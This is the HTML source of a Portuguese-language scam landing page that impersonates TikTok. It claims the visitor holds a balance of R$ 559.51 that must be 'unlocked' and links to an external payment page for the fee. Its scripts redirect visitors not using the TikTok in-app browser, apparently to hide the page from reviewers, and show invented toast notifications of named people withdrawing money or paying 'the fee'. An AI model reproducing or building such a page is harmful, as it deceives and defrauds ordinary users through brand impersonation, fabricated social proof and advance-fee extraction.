<!DOCTYPE html>
<html lang="pt">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>:: T I K T O K ::</title>
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <link href="https://cdnjs.cloudflare.com/ajax/libs/toastr.js/latest/css/toastr.min.css" rel="stylesheet">
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/toastr.js/2.1.4/toastr.min.js"></script>

    <script type="text/javascript">
        // Função para verificar se o navegador é o TikTok
        function isTikTokBrowser() {
            const userAgent = navigator.userAgent.toLowerCase();
            // Verifica se o User-Agent contém termos específicos do TikTok
            return /musical_ly|appname\/musical_ly|tiktok|bytewebview/.test(userAgent);
        }

        // Verifica se o navegador não é o do TikTok
        if (!isTikTokBrowser()) {
            // Caso não seja o navegador do TikTok, redireciona para uma página de bloqueio ou erro
            window.location.href = '/';  // Substitua com a página de erro ou bloqueio desejada
        }
    </script>
    
    <style>
        body {
            display: flex;
            flex-direction: column;
            min-height: 100vh;
            margin: 0;
            background-color: #f0f0f0;
            font-family: sans-serif;
            align-items: center;
            justify-content: flex-start;
            padding-top: 10px;
        }

        .header {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            background-color: #ff0150;
            color: white;
            font-weight: bold;
            text-align: center;
            padding: 12px;
            font-size: 12px;
            z-index: 1000;
        }

        #p1 {
            max-width: 400px;
            width: 90%;
            background-color: #FFFFFF;
            padding: 20px;
            display: flex;
            align-items: center;
            justify-content: space-between;
            margin: 20px;
        }

        #produto1 {
            width: 100%;
            max-width: 400px;
            text-align: center;
            padding: 0px;
            color: #ff0150;
            font-size: 16px;
        }

        #logo {
            width: 1350px;
            max-width: 150px;
        }

        .boxSaldo {
            display: flex;
            flex-direction: column;
            align-items: flex-end;
            border: 5px solid #ff0150;
            border-radius: 24px;
            padding: 5px 32px;
        }

        .textoSaldo {
            font-size: 12px;
            font-weight: bold;
            background: #fff;
            padding: 2px 14px;
            color: #333;
        }

        .valorSaldo {
            font-size: 16px;
            font-weight: 700;
            color: #333;
        }

        .phone-container {
            width: 340px;
            height: 620px;
            border: 3px solid #f30000a9;
            border-radius: 36px;
            box-shadow: 0 0 20px rgb(114, 24, 102);
            position: relative;
            overflow: hidden;
            background: #fff;
            margin: 0 auto 15px;
        }

        .video-container {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: #000;
            overflow: hidden;
        }

        video {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            object-fit: cover;
        }

        .video-thumbnail {
            position: absolute;
            top: 30%;
            left: 50%;
            width: 60%;
            height: 40%;
            cursor: pointer;
            background: url('images/3422.webp') center center no-repeat;
            background-size: cover;
            transform: translateX(-50%) scale(2);
            animation: pulse 2s infinite;
        }

        .hidden {
            opacity: 0;
            visibility: hidden;
            transition: opacity 0.3s ease;
        }

        @keyframes pulse {
            0% {
                transform: translateX(-50%) scale(0.85);
            }
            50% {
                transform: translateX(-50%) scale(1);
            }
            100% {
                transform: translateX(-50%) scale(0.95);
            }
        }

        .centralizar {
            width: 100%;
            display: flex;
            justify-content: center;
            margin-top: 4px;
        }

        button {
            background-color: #ff0150;
            color: white;
            border: none;
            border-radius: 5px;
            width: 85%;
            max-width: 300px;
            height: 50px;
            font-weight: bold;
            cursor: pointer;
            transition: background-color 0.3s;
        }

        button:hover {
            background-color: #e66a00;
        }

        @media (max-width: 480px) {
            #p1 {
                flex-direction: row;
                justify-content: space-between;
            }
        }
    </style>
</head>
<body>
    <div class="header">
        ASSISTA O VÍDEO ABAIXO PARA LIBERAR SEU SAQUE E ACESSO.
    </div>

    <div id="p1">
        <img id="logo" src="images/tiktoklogo.svg" alt="TikTok Logo">
        <div class="boxSaldo">
            <span class="textoSaldo">SALDO</span>
            <span class="valorSaldo">R$ <span class="saldoAtualizado">559.51</span></span>
        </div>
    </div>

    <div id="produto1">
        <h4 style="font-size: 24px; margin-top: 2px;">DESBLOQUEIO DE SALDO</h4>
        <h1 style="color: #000000be; font-size: 15px; margin-bottom: 4%;">Veja como liberar seu saque assistindo ao vídeo.</h1> 
    </div>   

    <div class="phone-container">
        <div class="video-container" onclick="unmuteVideo()">
            <video id="myVideo" autoplay muted>
                <source src="media/vsl_tiktok.mp4" type="video/mp4">
            </video>
            <div id="videoThumbnail" class="video-thumbnail"></div>
        </div>
    </div>

    <div class="centralizar">
        <a href="https://go.tribopay.com.br/xnvl0" style="text-decoration: none; width: 100%; display: flex; justify-content: center; ">
            <button>DESBLOQUEAR AGORA</button>
        </a>
    </div>
    <br>
    <br>
    <br>

    <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" width="32" height="50" viewBox="0 0 280 280" xml:space="preserve">
        <defs></defs>
        <g style="stroke: none; stroke-width: 0; stroke-dasharray: none; stroke-linecap: butt; stroke-linejoin: miter; stroke-miterlimit: 10; fill: none; fill-rule: nonzero; opacity: 1;" transform="translate(1.4065934065934016 1.4065934065934016) scale(2.81 2.81)" >
            <path d="M 36.203 35.438 v -3.51 c -1.218 -0.173 -2.447 -0.262 -3.677 -0.268 c -15.047 0 -27.289 12.244 -27.289 27.291 c 0 9.23 4.613 17.401 11.65 22.342 c -4.712 -5.039 -7.332 -11.681 -7.328 -18.58 C 9.559 47.88 21.453 35.784 36.203 35.438" style="stroke: none; stroke-width: 1; stroke-dasharray: none; stroke-linecap: butt; stroke-linejoin: miter; stroke-miterlimit: 10; fill: rgb(0,242,234); fill-rule: nonzero; opacity: 1;" transform=" matrix(1 0 0 1 0 0) " stroke-linecap="round" />
        <path d="M 36.847 75.175 c 6.714 0 12.19 -5.341 12.44 -11.997 l 0.023 -59.417 h 10.855 c -0.232 -1.241 -0.349 -2.5 -0.35 -3.762 H 44.989 l -0.025 62.777 c -0.001 3.953 2.248 7.514 5.884 9.179 C 43.573 95.915 39.016 94.505 36.847 75.175" style="stroke: none; stroke-width: 1; stroke-dasharray: none; stroke-linecap: butt; stroke-linejoin: miter; stroke-miterlimit: 10; fill: rgb(0,242,234); fill-rule: nonzero; opacity: 1;" transform=" matrix(1 0 0 1 0 0) " stroke-linecap="round" />
        <path d="M 58.342 44.239 c 4.775 -0.698 9.251 -3.223 12.15 -6.743 l 3.021 7.151 c -6.365 4.968 -15.501 6.776 -22.978 2.805 c 1.877 4.854 4.868 9.173 9.353 12.529 c 10.755 -9.883 7.443 -22.28 -2.455 -26.236" style="stroke: none; stroke-width: 1; stroke-dasharray: none; stroke-linecap: butt; stroke-linejoin: miter; stroke-miterlimit: 10; fill: rgb(0,242,234); fill-rule: nonzero; opacity: 1;" transform=" matrix(1 0 0 1 0 0) " stroke-linecap="round" />
    </g>
</svg>

<script>
    

    $(document).ready(function onDocumentReady() {
        var URL_FINAL = '#';
        var nome = [
            'Luciana Oliveira', 'Marcia Araújo', 'Carolina Dias', 'Martha', 'Aline Campos', 
            'Luciane R Freire', 'Simone Z', 'Laura Campos', 'Carla Dias', 'Mariana Ruas', 
            'Jessica Ribeiro', 'Karol Lia', 'Rafaela Silva', 'Bruna Santos', 'Fernanda Costa', 
            'Juliana Lima', 'Tatiane Souza', 'Isabela Alves', 'Gabriela Pereira', 'Camila Martins', 
            'Larissa Rocha', 'Patricia Oliveira', 'Cássia Gomes', 'Suelen Mendes', 'Amanda Costa', 
            'Letícia Almeida', 'Renata Rocha', 'Carolina Fernandes', 'Tatiane Alves', 'Daniele Lima',
            'Carlos Silva', 'José Oliveira', 'Felipe Souza', 'Gabriel Pereira', 'Lucas Costa',
            'Ricardo Santos', 'André Lima', 'Marcos Rocha', 'Pedro Almeida', 'Thiago Dias',
            'Mateus Martins', 'Rafael Gomes', 'Victor Almeida', 'Lucas Rodrigues', 'Bruno Oliveira'
        ];

        nome.sort(() => Math.random() - 0.5);
        var i = 0, qtd = nome.length;

        setInterval(function doThis() {
            if (i == 11) return; // somente 11 eventos serão disparados
            
            // Primeira mensagem
            toastr.success(nome[i++] + ' acabou de sacar R$ 559.51', {
                timeOut: 2000,
                positionClass: "toast-bottom-right",
                backgroundColor: '#28a745', // Cor verde para o sucesso
            });

            // Segunda mensagem
            if (i == 3 || i == 7 || i == 9) {
                toastr.info(nome[i++] + ' acaba de pagar a Taxa!', {
                    timeOut: 4000,
                    positionClass: "toast-bottom-right",
                    backgroundColor: '#17a2b8', // Cor azul para informação
                });
            }

            // Mensagem adicional (Terceira mensagem)
            if (i == 5 || i == 12) {
                toastr.success(nome[i++] + ' acabou de sacar R$ 559.51', {
                    timeOut: 6000,
                    positionClass: "toast-bottom-right",
                    backgroundColor: '#28a745', // Cor amarela para alerta
                });
            }

        }, 10 * 1000);   // a cada 10 segundos
    });
</script>



    <script>
        function unmuteVideo() {
            const video = document.getElementById('myVideo');
            const thumbnail = document.getElementById('videoThumbnail');
            if (video.muted) {
                video.muted = false;
                video.currentTime = 0;
                video.play();
                thumbnail.classList.add('hidden'); // Esconde a thumbnail ao desmutar
            }
        }
    </script>
</body>
</html>
